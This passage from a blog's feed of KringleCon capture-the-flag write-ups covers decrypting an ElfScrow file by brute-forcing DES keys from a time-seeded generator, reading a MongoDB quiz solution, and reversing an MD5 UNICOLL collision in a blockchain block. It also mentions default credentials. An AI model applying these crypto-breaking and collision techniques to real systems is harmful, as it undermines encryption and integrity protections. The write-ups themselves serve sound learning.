&lt;a href="https://downloads.elfu.org/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc" target="_blank" rel="noopener">encrypted_document&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>First is a Windows executable, which can be used to perform encryption on arbitrary input and observe the output. The second is a file storing debugging information about the encryption tool itself (this will help you mitigate the lack of access to its source code), and finally there is the encrypted document which you need to decipher.&lt;/p>
&lt;p>For further hints you may approach &lt;strong>Holly Evergreen&lt;/strong> in the NetWars room, but he will only reveal them if you help him solve some issues with his terminal first!&lt;/p>
&lt;p>&lt;img src="../images/obj10-room.png" alt="Holly Evergreen in NetWars room">&lt;/p>
&lt;blockquote>
&lt;p>Hey! It&amp;rsquo;s me, Holly Evergreen! My teacher has been locked out of the quiz database and can&amp;rsquo;t remember the right solution.
Without access to the answer, none of our quizzes will get graded.
Can we help get back in to find that solution?
I tried lsof -i, but that tool doesn&amp;rsquo;t seem to be installed.
I think there&amp;rsquo;s a tool like ps that&amp;rsquo;ll help too. What are the flags I need?
Either way, you&amp;rsquo;ll need to know a teensy bit of Mongo once you&amp;rsquo;re in.
Pretty please find us the solution to the quiz!&lt;/p>
&lt;/blockquote>
&lt;p>Now, you should click on the terminal near Holly and dive into the console to help him recover the quiz material he is after:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Hello dear player! Won&lt;span class="s1">&amp;#39;t you please come help me get my wish!
&lt;/span>&lt;span class="s1">I&amp;#39;&lt;/span>m searching teacher&lt;span class="err">&amp;#39;&lt;/span>s database, but all I find are fish!
Do all his boating trips effect some database dilution?
It should not be this hard &lt;span class="k">for&lt;/span> me to find the quiz solution!
Find the solution hidden in the MongoDB on this system.
elf@e496ebfb254b:~$ netstat -a -n -o
Active Internet connections &lt;span class="o">(&lt;/span>servers and established&lt;span class="o">)&lt;/span>
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp &lt;span class="m">0&lt;/span> &lt;span class="m">0&lt;/span> 127.0.0.1:12121 0.0.0.0:* LISTEN off &lt;span class="o">(&lt;/span>0.00/0/0&lt;span class="o">)&lt;/span>
tcp &lt;span class="m">0&lt;/span> &lt;span class="m">0&lt;/span> 127.0.0.1:54372 127.0.0.1:12121 TIME_WAIT timewait &lt;span class="o">(&lt;/span>7.43/0/0&lt;span class="o">)&lt;/span>
Active UNIX domain sockets &lt;span class="o">(&lt;/span>servers and established&lt;span class="o">)&lt;/span>
Proto RefCnt Flags Type State I-Node Path
unix &lt;span class="m">2&lt;/span> &lt;span class="o">[&lt;/span> ACC &lt;span class="o">]&lt;/span> STREAM LISTENING &lt;span class="m">168482939&lt;/span> /tmp/mongodb-12121.sock
elf@e496ebfb254b:~$ mongo --port &lt;span class="m">12121&lt;/span>
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:12121/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The hint in the terminal says that the database backend is MongoDB, so you should first use &lt;strong>netstat&lt;/strong> to find the port the mongod is listening on, then connect to it. Now you are in the mongo shell, ready to poke around and find the answer:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&amp;gt; show dbs
admin 0.000GB
config 0.000GB
elfu 0.000GB
&lt;span class="nb">local&lt;/span> 0.000GB
&lt;span class="nb">test&lt;/span> 0.000GB
&amp;gt; use elfu
switched to db elfu
&amp;gt; show tables
bait
chum
line
metadata
solution
system.js
tackle
tincan
&amp;gt; db.solution.find&lt;span class="o">()&lt;/span>
&lt;span class="o">{&lt;/span> &lt;span class="s2">&amp;#34;_id&amp;#34;&lt;/span> : &lt;span class="s2">&amp;#34;You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **&amp;#34;&lt;/span> &lt;span class="o">}&lt;/span>
&amp;gt; db.loadServerScripts&lt;span class="o">()&lt;/span>
&amp;gt; displaySolution&lt;span class="o">()&lt;/span>
.
__/ __
/
/.&lt;span class="s1">&amp;#39;o&amp;#39;&lt;/span>.
.*.&lt;span class="s1">&amp;#39;.
&lt;/span>&lt;span class="s1"> .&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;*&amp;#39;&lt;/span>.
*&lt;span class="s1">&amp;#39;.o.&amp;#39;&lt;/span>.*.
.&lt;span class="s1">&amp;#39;.*.&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;.*.
&lt;/span>&lt;span class="s1"> .o.&amp;#39;&lt;/span>.*.&lt;span class="s1">&amp;#39;.*.&amp;#39;&lt;/span>.
&lt;span class="o">[&lt;/span>_____&lt;span class="o">]&lt;/span>
___/
Congratulations!!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>With this, the technical challenge in Holly&amp;rsquo;s terminal is solved, and he is ready to provide you with some useful hints for solving the objective:&lt;/p>
&lt;blockquote>
&lt;p>Woohoo! Fantabulous! I&amp;rsquo;ll be the coolest elf in class.
On a completely unrelated note, digital rights management can bring a hacking elf down.
That ElfScrow one can really be a hassle.
It&amp;rsquo;s a good thing Ron Bowes is giving a talk on reverse engineering!
That guy knows how to rip a thing apart. It&amp;rsquo;s like he breathes opcodes!&lt;/p>
&lt;/blockquote>
&lt;p>His best hint points you to a YouTube video of Ron Bowes&amp;rsquo;s KringleCon
&lt;a href="https://www.youtube.com/watch?v=obJdpKDpFBA" target="_blank" rel="noopener">talk&lt;/a>. This is a very good hint, so be sure to watch it!&lt;/p>
&lt;h2 id="reverse-crypto---main-objective">Reverse crypto - Main Objective&lt;/h2>
&lt;p>To kick off the crypto fun, let&amp;rsquo;s run &lt;strong>elfscrow.exe&lt;/strong> right away to see how it can be used.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">C:&lt;span class="se">\U&lt;/span>sers&lt;span class="se">\a&lt;/span>dmin&lt;span class="se">\D&lt;/span>esktop&lt;span class="se">\e&lt;/span>lfscrow&amp;gt; elfscrow.exe
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!
Are you encrypting a file? Try --encrypt! For example:
elfscrow.exe --encrypt &amp;lt;infile&amp;gt; &amp;lt;outfile&amp;gt;
You&lt;span class="s1">&amp;#39;ll be given a secret ID. Keep it safe! The only way to get the file
&lt;/span>&lt;span class="s1">back is to use that secret ID to decrypt it, like this:
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1"> elfscrow.exe --decrypt --id=&amp;lt;secret_id&amp;gt; &amp;lt;infile&amp;gt; &amp;lt;outfile&amp;gt;
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">You can optionally pass --insecure to use unencrypted HTTP. But if you
&lt;/span>&lt;span class="s1">do that, you&amp;#39;&lt;/span>ll be vulnerable to packet sniffers such as Wireshark that
could potentially snoop on your traffic to figure out what&lt;span class="err">&amp;#39;&lt;/span>s going on!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This last sentence seems to invite you to do exactly what it warns against. However, while running the program with the &lt;strong>&amp;ndash;insecure&lt;/strong> flag and sniffing the network traffic with Wireshark, I could not find anything exploitable. The secret ID, which is used to retrieve the key from the server, is generated quite unpredictably. So instead of attacking the key ID, you should attack the algorithm that generates the encryption/decryption key itself.&lt;/p>
&lt;p>As mentioned in the objective, the file you need to decrypt was encrypted sometime between 7-9pm on December 6th, 2019 UTC. As such, the plan was to gather enough information to generate the same key that was used to encrypt the file. For this I had to do some further reconnaissance in IDA Pro, so I fired it up with the provided &lt;strong>.pdb&lt;/strong> file.&lt;/p>
&lt;p>After a few minutes of poking around in the GUI, I did a string search for &lt;strong>generate&lt;/strong> and found an interesting-looking sub-routine called &lt;code>generate_key&lt;/code>. I spent some time studying it and found the highlighted parts of the screenshot below quite interesting:&lt;/p>
&lt;p>&lt;img src="../images/obj10-keygen.png" alt="Generate_Key IDA PDB">&lt;/p>
&lt;p>It seems that in order to generate the key, it uses the current timestamp as the seed for a random number generator, which is a very useful observation. Next I noticed a loop that executes 8 times and generates one random byte per iteration, 64 bits in total, which suggests the DES encryption algorithm and its 64-bit key. To produce each byte, this sub-routine calls &lt;strong>super_secure_random&lt;/strong> on every iteration of the loop, as seen in the figure below:&lt;/p>
&lt;p>&lt;img src="../images/obj10-supersecure.png" alt="Super Secure Random IDA PDB">&lt;/p>
&lt;p>This sub-routine contains some constants, and a few Google searches reveal that they are used in Linear Congruential Generator algorithms (LCG for short -
&lt;a href="https://en.wikipedia.org/wiki/Linear_congruential_generator" target="_blank" rel="noopener">link&lt;/a>). Then I searched for some example implementations of this algorithm, and found a very useful website, which has the same algorithm implemented in many different languages. As I like to work with Go, I decided to choose
&lt;a href="https://rosettacode.org/wiki/Linear_congruential_generator#Go" target="_blank" rel="noopener">this&lt;/a> implementation and go from there.&lt;/p>
&lt;p>To check whether my code generates the correct key for a given seed, I executed &lt;strong>elfscrow.exe&lt;/strong> once more and noted the values in its output:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">C:&lt;span class="se">\&amp;gt;&lt;/span> elfscrow.exe --insecure --encrypt elfscrow.pdb encrypted_elfscrow.pdb.enc
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!
Our miniature elves are putting together random bits &lt;span class="k">for&lt;/span> your secret key!
&lt;span class="nv">Seed&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="m">1577895929&lt;/span> &lt;span class="s">&amp;lt;&amp;lt; NOTE THIS
&lt;/span>&lt;span class="s">Generated an encryption key: 09f384150bdb41ba (length: 8) &amp;lt;&amp;lt; AN&lt;/span>D THIS
...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I fed the same seed into the algorithm I put together to generate a key for DES, and observed the same key output:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/elfscrow ▶ go run lcg.go
Seed: &lt;span class="m">1577895929&lt;/span>
Key: 09f384150bdb41ba
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The key generated by my code matches the one printed in the Windows command line after running &lt;strong>elfscrow.exe&lt;/strong> on a sample file. This is good news! Next, I looked on the Internet for an example implementation of DES decryption in Go and found a good
&lt;a href="https://stackoverflow.com/questions/41579325/golang-how-do-i-decrypt-with-des-cbc-and-pkcs7" target="_blank" rel="noopener">solution&lt;/a> on StackOverflow&amp;hellip; as usual!&lt;/p>
&lt;p>Finally, I integrated this Go code for DES decryption with my key generation code, creating a tool that loops through every second of the given time interval, generates the corresponding key, and tries to decrypt the given file with it. If the result is a valid PDF (the plain-text starts with &lt;code>%PDF&lt;/code>), it saves the result to a pdf file on disk. The program takes around 2-3 minutes to iterate through every second of the interval, but eventually it successfully recovers the pdf file. The timestamp when the encryption happened is:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">12/06/2019 @ 8:20pm &lt;span class="o">(&lt;/span>UTC&lt;span class="o">)&lt;/span> - &lt;span class="m">1575663650&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This code can be found in a Github
&lt;a href="https://github.com/florianakos/kringlecon-elfscrow" target="_blank" rel="noopener">repo&lt;/a> I created.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/elfscrow ▶ go run des-go.go
Key-Used: b5ad6a321240fbec - TimeStamp: &lt;span class="m">1575663650&lt;/span> - First-4-Chars: %PDF...
~/elfscrow ▶
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The program saves the decrypted pdf in the directory where it is executed. Opening the pdf, we can finally recover the solution to this objective:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Machine Learning Sleigh Route Finder
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Blockchain Investigation Part 2</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11b/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11b/</guid><description>&lt;p>&lt;img src="../images/obj11b/objective11b.png" alt="Objective11b">&lt;/p>
&lt;p>This final objective includes no new elves to talk with, so I have to rely on previous intel from &lt;code>Tinsel&lt;/code> and &lt;code>Tangle&lt;/code> who shared quite a lot already as part of
&lt;a href="https://flrnks.netlify.app/tutorials/kringlecon2020/objective11a">Objective11a&lt;/a>.&lt;/p>
&lt;p>The main new piece of information for &lt;code>11b&lt;/code> is the SHA256 of the block that I need to inspect more closely. It&amp;rsquo;s suspected that Jack has somehow managed to do the impossible and modify its content without breaking the blockchain. The hash of this block is:&lt;/p>
&lt;p>&lt;code>58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&lt;/code>.&lt;/p>
&lt;p>This final objective mentions that Jack possibly got away with this by tweaking just &lt;code>4 bytes&lt;/code>, so my focus is now on figuring out where those 4 bytes may be hiding so that I can try to undo the changes.&lt;/p>
&lt;p>There is a small amount of new information in the badge hints section:&lt;/p>
&lt;ul>
&lt;li>&lt;code>Shinny Upatree&lt;/code> swears that he doesn&amp;rsquo;t remember writing the contents of the document found in that block. Maybe looking closely at the documents, you might find something interesting.&lt;/li>
&lt;li>If Jack was somehow able to change the contents of the block, AND the document without changing the hash&amp;hellip; that would require a &lt;code>very UNIque hash COLLision&lt;/code>.&lt;/li>
&lt;/ul>
&lt;p>These two hints suggest that Jack made two modifications, &lt;strong>one in the block data structure&lt;/strong> and &lt;strong>one in the attached PDF&lt;/strong> itself; and secondly, that he may have used the &lt;strong>UNICOLL&lt;/strong> technique, which has some very special properties when applied to MD5. The hint about &lt;strong>UNICOLL&lt;/strong> only clicked for me after going through the lengthy slide deck from
&lt;a href="https://speakerdeck.com/ange/colltris" target="_blank" rel="noopener">this presentation&lt;/a> by Ange Albertini.&lt;/p>
&lt;p>Armed with this knowledge I set out to inspect the block in question using the provided python script. I write a bit of code to loop through the whole chain until the block with correct SHA256 is found and then print it to the terminal and save it to file as &lt;code>block129459.dat&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln">1&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">)):&lt;/span>
&lt;span class="ln">2&lt;/span> &lt;span class="n">h&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">SHA256&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">new&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="ln">3&lt;/span> &lt;span class="n">h&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">update&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">block_data_signed&lt;/span>&lt;span class="p">())&lt;/span>
&lt;span class="hl">&lt;span class="ln">4&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="n">h&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">hexdigest&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s1">&amp;#39;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&amp;#39;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;span class="ln">5&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="ln">6&lt;/span> &lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">save_a_block&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;block{chain.blocks[i].index}.dat&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Below is a redacted version of this block as printed to terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>root@c288761e5038:/usr/src/app# python3 naughty_nice.py
&lt;span class="ln"> 2&lt;/span>Chain Index: &lt;span class="m">129459&lt;/span>
&lt;span class="ln"> 3&lt;/span> Nonce: a9447e5771c704f4
&lt;span class="ln"> 4&lt;/span> PID: 0000000000012fd1
&lt;span class="ln"> 5&lt;/span> RID: 000000000000020f
&lt;span class="ln"> 6&lt;/span> Document Count: &lt;span class="m">2&lt;/span>
&lt;span class="hl">&lt;span class="ln"> 7&lt;/span> Score: ffffffff &lt;span class="o">(&lt;/span>4294967295&lt;span class="o">)&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln"> 8&lt;/span> Sign: &lt;span class="m">1&lt;/span> &lt;span class="o">(&lt;/span>Nice&lt;span class="o">)&lt;/span>
&lt;/span>&lt;span class="ln"> 9&lt;/span> Data item: &lt;span class="m">1&lt;/span>
&lt;span class="hl">&lt;span class="ln">10&lt;/span> Data Type: ff &lt;span class="o">(&lt;/span>Binary blob&lt;span class="o">)&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln">11&lt;/span> Data Length: 0000006c
&lt;/span>&lt;span class="hl">&lt;span class="ln">12&lt;/span> Data: b&lt;span class="s1">&amp;#39;ea4...8d8f09&amp;#39;&lt;/span>
&lt;/span>&lt;span class="ln">13&lt;/span> Data item: &lt;span class="m">2&lt;/span>
&lt;span class="ln">14&lt;/span> Data Type: &lt;span class="m">05&lt;/span> &lt;span class="o">(&lt;/span>PDF&lt;span class="o">)&lt;/span>
&lt;span class="ln">15&lt;/span> Data Length: 00009f57
&lt;span class="ln">16&lt;/span> Data: b&lt;span class="s1">&amp;#39;255...019a43&amp;#39;&lt;/span>
&lt;span class="hl">&lt;span class="ln">17&lt;/span> Date: 03/24
&lt;/span>&lt;span class="ln">18&lt;/span> Time: 13:21:41
&lt;span class="ln">19&lt;/span> PreviousHash: 4a91947439046c2dbaa96db38e924665
&lt;span class="ln">20&lt;/span> Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
&lt;span class="ln">21&lt;/span> Signature: b&lt;span class="s1">&amp;#39;MJIx...MCtHfw==&amp;#39;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Several lines stand out immediately as suspicious:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>Line 7&lt;/strong> is suspicious because of the maxed-out integer value. In the hints a different value is mentioned by &lt;code>Tinsel&lt;/code>: &lt;strong>4,294,935,958&lt;/strong>, which corresponds to &lt;code>FFFF8596&lt;/code> and differs from &lt;code>FFFFFFFF&lt;/code> in two bytes. However, this turns out to be a dead-end after realizing that it is not compatible with what I&amp;rsquo;ve learnt about the UNICOLL technique.&lt;/li>
&lt;li>&lt;strong>Line 8&lt;/strong> is suspicious because Jack does not seem to be a trustworthy character, so perhaps he may have flipped the Nice/Naughty switch in the block to cheat the system. This suspicion is confirmed later when I extract the PDF and unlock the hidden content originally written by Shinny as a report on Jack&amp;rsquo;s &lt;strong>Naughty&lt;/strong> behaviour!&lt;/li>
&lt;li>&lt;strong>Lines 10-11-12&lt;/strong> are suspicious simply because no other block contains two attached files, though I cannot immediately explain why this is significant.&lt;/li>
&lt;li>&lt;strong>Line 17&lt;/strong> is suspicious because Jack might have tweaked the date to hide his activity, switching the month from December 24 to March 24. However, this seems to be a dead-end as well because it&amp;rsquo;s inconsistent with the &lt;strong>UNICOLL&lt;/strong> technique.&lt;/li>
&lt;/ul>
&lt;p>Next I set out to inspect the PDF document more closely, extracting it to the filesystem using the provided python script. After opening it in &lt;code>HexFiend&lt;/code> I do not find anything suspicious at first, so I go back to the slide-deck from Ange to see if I can find some clues there, and I sure do:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/pdf-clue.png" alt="PDF Trickery">&lt;/p>
&lt;p>This slide shows a trick that can be used to tweak the contents of a PDF by changing which object or page is referenced. I try the same on the extracted PDF, and its content changes dramatically. It goes from a glowing report on Jack to this:&lt;/p>
&lt;pre>&lt;code>Earlier today, I saw this bloke Jack Frost climb into one of our cages and repeatedly kick a wombat.
I don’t know what’s with him... it’s like he’s a few stubbies short of a six-pack or somethin’.
I don’t think the wombat was actually hurt... but I tell ya, it was more ‘n a bit shook up.
Then the bloke climbs outta the cage all laughin’ and cacklin’ like it was some kind of bonza joke.
Never in my life have I seen someone who was that bloody evil...
- Quote from a Sydney (Australia) Zookeeper
I have reviewed a surveillance video tape showing the incident and found that it does, indeed, show that
Jack Frost deliberately traveled to Australia just to attack this cute, helpless animal. It was appalling.
I tracked Frost down and found him in Nepal. I confronted him with the evidence and, surprisingly, he seems
to actually be incredibly contrite. He even says that he’ll give me access to a digital photo that shows his
“utterly regrettable” actions. Even more remarkably, he’s allowing me to use his laptop to generate this
report – because for some reason, my laptop won’t connect to the WiFi here.
He says that he’s sorry and needs to be “held accountable for his actions.” He’s even said that I should
give him the biggest Naughty/Nice penalty possible. I suppose he believes that by cooperating with me,
that I’ll somehow feel obliged to go easier on him. That’s not going to happen... I’m WAAAAY smarter than old Jack.
Oh man... while I was writing this up, I received a call from my wife telling me that one of the pipes in our
house back in the North Pole has frozen and water is leaking everywhere. How could that have happened?
Jack is telling me that I should hurry back home. He says I should save this document and then he’ll go ahead and submit the full report for me.
I’m not completely sure I trust him, but I’ll make myself a note and go in and check to make absolutely sure he submits this properly.
Shinny Upatree 3/24/2020
&lt;/code>&lt;/pre>&lt;p>&lt;strong>Note&lt;/strong>: on MacOS I have to open this PDF in either Firefox or Chrome, because the built-in reader detects some corruption that prevents it from opening properly.&lt;/p>
&lt;p>Once I have uncovered the hidden content, I am sure that this page-reference byte is one of the 4 bytes that Jack tweaked in the block.&lt;/p>
&lt;p>Next I open the whole block in &lt;code>HexFiend&lt;/code> to see it in its entirety. I spend many hours trying to find the two remaining bytes that Jack had tweaked. I am also in touch with some fellow HHC attendees who provide some great insight to help me avoid dead ends in my endeavors.&lt;/p>
&lt;p>Eventually what helps me tremendously is the slide-deck from Ange and a tip from &lt;code>joergen&lt;/code> to keep MD5&amp;rsquo;s 64-byte chunk size in mind. This information, combined with slide 113, helps me find the remaining two bytes:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/slide-113.png" alt="Slide 113">&lt;/p>
&lt;p>It turns out that, due to the cryptographic properties of MD5 exploited by UNICOLL, if you change a byte in chunk N by +1, you need to change the byte at the same position in chunk N+1 by -1 (and vice versa) to keep the MD5 hash the same. Finally, it clicks why there is a random binary file attached to the block: it is the extra random garbage that absorbs the compensating change, helping with the flipping of the Sign from &lt;code>Naughty&lt;/code> to &lt;code>Nice&lt;/code> while keeping the hash of the whole block unchanged.&lt;/p>
&lt;p>Next I go back to &lt;code>HexFiend&lt;/code> with the whole block open and modify the 4 bytes using this rule:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/hex-fiend-solve.png" alt="Hex Fiend Solution">&lt;/p>
&lt;p>Tweaks explained:&lt;/p>
&lt;ol>
&lt;li>byte 73 was &lt;code>0x31&lt;/code> and I set it to &lt;code>0x30&lt;/code> so that it becomes &lt;code>Naughty&lt;/code> again&lt;/li>
&lt;li>to keep the MD5 from changing, I then had to increase byte 137 by 1 from &lt;code>0xD6&lt;/code> to &lt;code>0xD7&lt;/code>&lt;/li>
&lt;li>byte 265 was &lt;code>0x32&lt;/code> and I changed it to &lt;code>0x33&lt;/code> to fix the PDF document&lt;/li>
&lt;li>to keep the MD5 from changing, I then had to decrease byte 329 from &lt;code>0x1C&lt;/code> to &lt;code>0x1B&lt;/code>&lt;/li>
&lt;/ol>
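&lt;p>As a sanity check, the same four tweaks can be applied programmatically instead of by hand in the hex editor. A small Python sketch using the offsets and values from the list above (note that each pair of offsets is exactly 64 bytes, one MD5 chunk, apart, and that the +1/-1 changes within a pair cancel out):&lt;/p>

```python
# (offset, old, new) triples as read from my HexFiend session
TWEAKS = [
    (73,  0x31, 0x30),  # Sign byte: Nice becomes Naughty again
    (137, 0xD6, 0xD7),  # +1 exactly one MD5 chunk (64 bytes) later compensates
    (265, 0x32, 0x33),  # PDF page reference: restores the hidden report
    (329, 0x1C, 0x1B),  # -1 one chunk later compensates again
]

def fix_block(data):
    """Return a copy of the block bytes with Jack's four tweaks undone."""
    fixed = bytearray(data)
    for offset, old, new in TWEAKS:
        assert fixed[offset] == old, f"unexpected byte at offset {offset}"
        fixed[offset] = new
    return bytes(fixed)
```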
&lt;p>Next, I use the docker image to get the MD5 and SHA256 values of the fixed block, and to my big surprise the MD5 remains unchanged:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>root@c288761e5038:/usr/src/app# md5sum block129459.dat
&lt;span class="hl">&lt;span class="ln">2&lt;/span>b10b4a6bd373b61f32f4fd3a0cdfbf84
&lt;/span>&lt;span class="ln">3&lt;/span>root@c288761e5038:/usr/src/app# sha256sum block129459.dat
&lt;span class="hl">&lt;span class="ln">4&lt;/span>fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>I then submit the SHA256 hash of the fixed block &lt;code>fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb&lt;/code> and it is accepted as correct! 😎 🎉&lt;/p>
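&lt;p>Incidentally, the same verification can be done without the docker image, using Python&amp;rsquo;s built-in &lt;code>hashlib&lt;/code> on the fixed block file:&lt;/p>

```python
import hashlib

def digests(path):
    """Compute MD5 and SHA256 of a file in one pass over its bytes."""
    md5, sha = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            md5.update(chunk)
            sha.update(chunk)
    return md5.hexdigest(), sha.hexdigest()

# md5_hex, sha_hex = digests("block129459.dat")
# after the fix, md5_hex should still be b10b4a6bd373b61f32f4fd3a0cdfbf84
```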
&lt;p>Finally, I go up to the balcony in Santa&amp;rsquo;s Office to complete the narrative and join the party:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/victory.png" alt="Victory">&lt;/p></description></item><item><title>Open the Sleigh Shop Door</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective11/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective11/</guid><description>&lt;h2 id="ips-or-tables-what">IPs or Tables? What?!&lt;/h2>
&lt;p>Instructions in your personal badge:&lt;/p>
&lt;blockquote>
&lt;p>Visit Shinny Upatree in the Student Union and help solve their problem.
What is written on the paper you retrieve for Shinny?
For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.&lt;/p>
&lt;/blockquote>
&lt;p>Once you teleport to the Student Union building through the air-vents system, you can get further hints from Kent, but first he needs your help with something quite urgent!&lt;/p>
&lt;p>&lt;img src="../images/obj11-kent.png" alt="Kent and his braces">&lt;/p>
&lt;blockquote>
&lt;p>OK, this is starting to freak me out!
Oh sorry, I&amp;rsquo;m Kent Tinseltooth. My Smart Braces are acting up.
Do&amp;hellip; Do you ever get the feeling you can hear things? Like, voices?
I know, I sound crazy, but ever since I got these&amp;hellip; Oh!
Do you think you could take a look at my Smart Braces terminal?
I&amp;rsquo;ll bet you can keep other students out of my head, so to speak.
It might just take a bit of Iptables work.&lt;/p>
&lt;/blockquote>
&lt;p>So after you get the hints from Kent about his problem, you can investigate further in the terminal device next to him:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I&lt;span class="s1">&amp;#39;m talking to you, Kent.
&lt;/span>&lt;span class="s1">Kent TinselTooth: Who said that? I must be going insane.
&lt;/span>&lt;span class="s1">Kent TinselTooth: Am I?
&lt;/span>&lt;span class="s1">Inner Voice: That remains to be seen, Kent. But we are having a conversation.
&lt;/span>&lt;span class="s1">Inner Voice: This is Santa, Kent, and you&amp;#39;&lt;/span>ve been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you&lt;span class="s1">&amp;#39;ve built an automated, machine-learning, sleigh device.
&lt;/span>&lt;span class="s1">Kent TinselTooth: How did you know that?
&lt;/span>&lt;span class="s1">Inner Voice: I&amp;#39;&lt;/span>m Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That&lt;span class="s1">&amp;#39;s right, Kent. Where is the sleigh device now?
&lt;/span>&lt;span class="s1">Kent TinselTooth: I can&amp;#39;&lt;/span>t tell you.
Inner Voice: How would you like to intern &lt;span class="k">for&lt;/span> the rest of time?
Kent TinselTooth: Please no, they&lt;span class="s1">&amp;#39;re testing it at srf.elfu.org using default creds, but I don&amp;#39;&lt;/span>t know more. It&lt;span class="s1">&amp;#39;s classified.
